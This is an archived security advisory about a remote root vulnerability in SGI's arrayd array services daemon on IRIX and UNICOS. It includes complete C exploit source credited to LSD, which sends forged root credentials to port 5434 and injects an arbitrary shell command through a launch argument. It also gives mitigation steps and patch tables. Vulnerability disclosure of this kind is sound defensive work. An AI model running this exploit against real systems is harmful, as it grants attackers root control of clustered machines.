COMMAND

    arrayd

SYSTEMS AFFECTED

    6.2...6.5.4, UNICOS 9 and later

PROBLEM

    Following  is  based  on  SGI  Security  Advisory.   The SGI Array
    Services  provide  a  mechanism  to  simplify  administering   and
    managing an array  of clustered systems.   The arrayd(1m)  program
    is  part  of  the  array_services(5)  and  is  known  as the array
    services   daemon.      Unfortunately,   the   default    security
    configuration  of  arrayd  from  array.auth(4)  does  not  provide
    adequate protection  against attack  when the  array of  clustered
    systems are placed on an  untrusted network.  For example,  if the
    systems are placed on the Internet without a firewall, there is  a
    possible root  compromise of  all clustered  systems in  the array
    when the default array.auth configuration is used.

    On IRIX, the SGI Array  services consists of an inst  image called
    arraysvcs.  The  arraysvcs inst image  is installed by  default on
    IRIX 6.4-6.5.4 from the IRIX  Applications CD and available as  an
    optional product for IRIX 6.2-6.3.  All sites using array services
    on UNICOS  9.0 or  later are  vulnerable.   Array services are not
    supported on  UNICOS/mk, so  it is  not vulnerable.   The  default
    arrayd.auth  configuration  file   has  authentication   disabled.
    A local user  account on the  vulnerable array is  not required in
    order to  exploit the  arrayd daemon.   The arrayd  daemon can  be
    exploited  remotely  over  an   untrusted  network.   The   arrayd
    vulnerability  can  lead  to  a  root  compromise  on an untrusted
    network  if  the  array  services  are running and the arrayd.auth
    configuration file has not been changed to enable authentication.

    Code by LSD.

    /*## copyright LAST STAGE OF DELIRIUM aug 1999 poland        *://lsd-pl.net/ #*/
    /*## arrayd                                                                  #*/
    
    /*   this code makes the same as the following command invoked with root user */
    /*   privileges:                                                              */
    /*   /usr/sbin/array -s address launch pvm xxx xxx xxx "\";command;exit\""    */
    /*   there are two possible authentication methods that can be used by        */
    /*   the arrayd service:                                                      */
    /*   AUTHENTICATION NONE                                                      */
    /*       requests from anywhere are accepted                                  */
    /*   AUTHENTICATION SIMPLE                                                    */
    /*       requests from trusted hosts are accepted if they match the host/key  */
    /*       from arrayd.auth file. if there is not a specific host/key pair for  */
    /*       a given machine the request is also accepted although it should not  */
    /*       be (see manual pages in case you dont believe it).                   */
    /*       as you see, SGI suggestion to protect arrayd cluster by enabling     */
    /*       simple authentication gives no result                                */
    
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <stdio.h>
    #include <errno.h>
    
    char msg1[]={
        0x31,0x08,0x12,0x63,0x13,0x54,0x34,0x23,
        0x00,0x00,0x00,0x00,0x12,0x34,0x56,0x78,
        0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x03,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };
    
    char msg2[]={
        0x00,0x00,0x00,0x02,0x10,0x00,0x28,0x00,
        0x00,0x00,0x00,0x0f,
    
        0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* array   */
        0x00,0x00,0x00,0x5c,0x12,0x34,0x56,0x78,   /* args    */
        0x00,0x00,0x00,0x24,0x00,0x00,0x00,0x38,   /* creds   */
    
        /* creds */
        0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* origin  */
        0x00,0x00,0x00,0x28,0x00,0x00,0x00,0x05,   /* user    */
        0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x05,   /* group   */
        0xff,0xff,0xff,0xff,0x00,0x00,0x00,0x00,   /* project */
        0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
    
        'r' ,'o' ,'o' ,'t' ,0x00,0x00,0x00,0x00,
        'r' ,'o' ,'o' ,'t' ,0x00,0x00,0x00,0x00,
    
        /* args */
        0x00,0x00,0x00,0x06,
        0x00,0x00,0x00,0x0c,0x00,0x00,0x00,0x30,
    
        0x00,0x00,0x00,0x3c,0x00,0x00,0x00,0x07,
        0x00,0x00,0x00,0x44,0x00,0x00,0x00,0x04,
        0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x04,
        0x00,0x00,0x00,0x4c,0x00,0x00,0x00,0x04,
        0x00,0x00,0x00,0x50,0x00,0x00,0x00,0x03,
        0x00,0x00,0x00,0x54,0x12,0x34,0x56,0x78,
    
        'l' ,'a' ,'u' ,'n' ,'c' ,'h' ,0x00,0x00,
        'p' ,'v' ,'m' ,0x00,'x' ,'x' ,'x' ,0x00,
        'x' ,'x' ,'x' ,0x00,'x' ,'x' ,'x' ,0x00,
    };
    
    main(int argc,char **argv){
        char buffer[10000],len[4],*b,*cmd="id";
        int i,c,sck;
        struct sockaddr_in address;
        struct hostent *hp;
    
        printf("copyright LAST STAGE OF DELIRIUM aug 1999 poland  //lsd-pl.net/\n");
        printf("arrayd for irix 6.2 6.3 6.4 6.5 6.5.4 IP:all\n\n");
    
        if(argc<2){
            printf("usage: %s address [-c command]\n",argv[0]);
            exit(-1);
        }
    
        while((c=getopt(argc-1,&argv[1],"c:"))!=-1){
            switch(c){
            case 'c': cmd=optarg;break;
            }
        }
    
        sck=socket(AF_INET,SOCK_STREAM,0);
        bzero(&address,sizeof(address));
    
        address.sin_family=AF_INET;
        address.sin_port=htons(5434);
        if((address.sin_addr.s_addr=inet_addr(argv[1]))==-1){
            if((hp=gethostbyname(argv[1]))==NULL){
                errno=EADDRNOTAVAIL;perror("error");exit(-1);
            }
            memcpy(&address.sin_addr.s_addr,hp->h_addr,4);
        }
        if(connect(sck,(struct sockaddr *)&address,sizeof(address))<0){
            perror("error");exit(-1);
        }
    
        memcpy(buffer,msg2,sizeof(msg2));
        sprintf(&buffer[sizeof(msg2)],"\";%s;exit\"",cmd);
    
        *(unsigned long*)len=htonl(sizeof(msg2)+strlen(cmd)+8+1);
        b=&msg1[12];
        for(i=0;i<4;i++) *b++=len[i];
    
        write(sck,msg1,64);
        write(sck,buffer,sizeof(msg2)+strlen(cmd)+8+1);
    
        read(sck,buffer,64);
        read(sck,buffer,sizeof(buffer));
    
        b=&buffer[8];
        if((*(unsigned long*)b)!=1){
            printf("error: command refused\n");exit(-1);
        }
        b=&buffer[12];
        if(((*(unsigned long*)b)!=1)&&((*(unsigned long*)b)!=2)){
            printf("error: command not executed\n");exit(-1);
        }
        printf("OK!\n");
    }

SOLUTION

    The steps below can be used to either 1) remove the  vulnerability
    by removing the Array  Services if they are  not being used or  2)
    enable authorization  using a  appropriately setup  arrayd.auth(4)
    configuration file.  On IRIX:

        1) Become the root user on the system.
        2) Check  to  see  if  the  system  is  running the SGI  Array
           Services.
        3) Edit the default arrayd.auth file to enable authentication.
        4) Comment out authentication  entry in the arrayd.auth  file.
           This will enable SIMPLE authentication.
        5) Configure SIMPLE authentication in the arrayd.auth file  if
           array  services  are  needed  on  untrusted  networks.  See
           arraysvcs release  notes or  arrayd.auth man  page for more
           information on configuring SIMPLE authentication.
        6) Restart  the arrayd  daemon so  that it  will read  the new
           configuration files.
        7) Return to previous level (if you made su).

    On UNICOS:

        1) Become the root user on the system.
        2) Edit the default arrayd.auth file to enable authentication.
        3) Replace AUTH NONE entry with AUTH SIMPLE in the arrayd.auth
           file.  This will enable SIMPLE authentication.
        4) Configure SIMPLE authentication in the arrayd.auth file  if
           array  services  are  needed  on  untrusted  networks.  See
           arrayd.auth man  page for  more information  on configuring
           SIMPLE authentication.
        5) Restart  the arrayd  daemon so  that it  will read  the new
           configuration files.
        6) Return to previous level (if you made su).

    Proper solution is patch.  For IRIX:

        OS Version     Vulnerable?     Patch #      Other Actions
        ----------     -----------     -------      -------------
        IRIX 3.x-5.X      no                        Note 1
        IRIX 6.0.x        no                        Note 1
        IRIX 6.1          no                        Note 1
        IRIX 6.2          yes          not avail    Note 2 & 3
        IRIX 6.3          yes          not avail    Note 1 & 3
        IRIX 6.4          yes          not avail    Note 1 & 3
        IRIX 6.5          yes          not avail    Note 3 & 4
        IRIX 6.5.1        yes          not avail    Note 3 & 4
        IRIX 6.5.2        yes          not avail    Note 3 & 4
        IRIX 6.5.3        yes          not avail    Note 3 & 4
        IRIX 6.5.4        yes          not avail    Note 3 & 4

        1) This  version  of  the  IRIX operating system has  retired.
           Upgrade to currently supported IRIX operating system.   See
           http://support.sgi.com/news/irix2.html for more information

        2) This version of the IRIX operating system is in maintenance
           mode.  See http://support.sgi.com/news/irix1.html for  more
           information.
        3) Use temporary solution above
        4) If you  have not received  an IRIX 6.5.X  CD for IRIX  6.5,
           contact  your  SGI  Support  Provider  or download the IRIX
           6.5.X Maintenance Release Stream from
           http://support.sgi.com/ or
           ftp://support.sgi.com/support/relstream/

    For UNICOS

        OS Versions          Vulnerable?     Other Actions
        -----------          -----------     -------------
        UNICOS /mk               No
        UNICOS 9.0.X.X          Yes          Note 1
        UNICOS 10.0	            Yes          Note 1
        UNICOS 10.0.0.1         Yes          Note 1
        UNICOS 10.0.0.2         Yes          Note 1
        UNICOS 10.0.0.3         Yes          Note 1
        UNICOS 10.0.0.4         Yes          Note 1
        UNICOS 10.0.0.5         Yes          Note 1
        UNICOS 10.0.0.6         Yes          Note 1

        1) See temporary solution above.